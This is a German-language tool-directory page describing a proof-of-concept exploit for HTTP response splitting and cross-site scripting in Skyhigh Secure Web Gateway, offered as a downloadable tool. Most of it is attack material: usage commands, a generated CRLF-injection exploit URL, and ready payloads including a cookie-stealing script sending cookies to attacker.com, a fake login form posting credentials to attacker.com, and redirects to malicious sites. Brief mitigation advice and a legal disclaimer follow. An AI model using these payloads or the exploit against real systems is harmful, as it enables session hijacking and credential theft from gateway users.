Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-0214 — Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) | Kitploit
Tools/GitHubGitHub/0pts/cve-2023-0214
Phishing-ToolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHub0pts/cve-2023-0214

CVE-2023-0214

Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SWG Exploit Generator

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

von 0PTS

Proof of Concept für die Schwachstelle HTTP Response Splitting in Skyhigh Secure Web Gateway (ehemals McAfee Web Gateway).

Über die Schwachstelle

Kritische Schwachstelle HTTP Response Splitting in Skyhigh Secure Web Gateway, die Remote-XSS-Angriffe durch Injektion beliebigen HTML/JavaScript-Codes ermöglicht.

Technische Details

  • Typ: HTTP Response Splitting / Cross-Site Scripting (XSS)
  • Gefährdung: Hoch
  • Angriffsvektor: Remote, keine Authentifizierung erforderlich

Funktionsweise des Exploits

Die Schwachstelle befindet sich im Plugin "Ssos" (Aktion SetLoginToken), das URL-Parameter falsch verarbeitet:

  1. Parameter "p" → wird in den P3P-Header injiziert
  2. Parameter "c" → wird in den Antwortkörper injiziert
  3. Parameter "v" → wird in das Cookie MwgSso injiziert

Da die Zeilenumbruchszeichen (\r\n / %0d%0a) nicht maskiert werden, kann ein Angreifer:

  • Beliebige HTTP-Header injizieren
  • Content-Type und Content-Length überschreiben
  • Beliebigen HTML/JavaScript-Code injizieren

Der Browser ignoriert den restlichen Inhalt der Antwort nach einem korrekt formatierten Content-Length, wodurch der angezeigte Inhalt vollständig ersetzt werden kann.

Verwendung

Grundlegender Start

root@kitploit:~
python explot.py

Mit Parametern (wie nmap)

root@kitploit:~
# Basis-XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# Weiterleitung
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# Phishing-Formular
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# Nur URL (ruhiger Modus)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

Parameter

root@kitploit:~
-d, --domain    Zieldomain (Standard: google.com)
-x, --prefix    URL-Pfad-Präfix (Standard: SWG internal path)
-p, --payload   HTML/JavaScript-Payload
-q, --quiet     Ruhiger Modus – nur URL
-v, --version   Skriptversion
-h, --help      Hilfe

Beispiele für Payloads

XSS mit Cookie-Diebstahl

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

Phishing-Formular

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>Sitzung abgelaufen – Bitte erneut anmelden</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Benutzername"><br>
<input type="password" name="pass" placeholder="Passwort"><br>
<button>Anmelden</button>
</form>
</body>
</html>

Weiterleitung auf bösartige Website

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

Demonstration

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Ziel-Domain:   example.com
[+] Payload-Länge:  43 Bytes
[+] URL-Länge:      234 Zeichen

[+] Generierte URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Schutzmaßnahmen

  1. Aktualisieren Sie Skyhigh SWG auf die neueste Version
  2. Verwenden Sie eine WAF mit Filterung von CRLF-Injektionen
  3. Überwachen Sie verdächtige Anfragen an /mwg-internal/*

Haftungsausschluss

⚠️ WARNUNG: Dieses Tool ist ausschließlich bestimmt für:

  • Autorisiertes Penetrationstesting
  • Bildungszwecke
  • CTF-Wettbewerbe
  • Sicherheitsforschung

Die Verwendung gegen Systeme ohne ausdrückliche Genehmigung des Eigentümers ist rechtswidrig.

Quellen

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security Bulletins

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
Tool herunterladen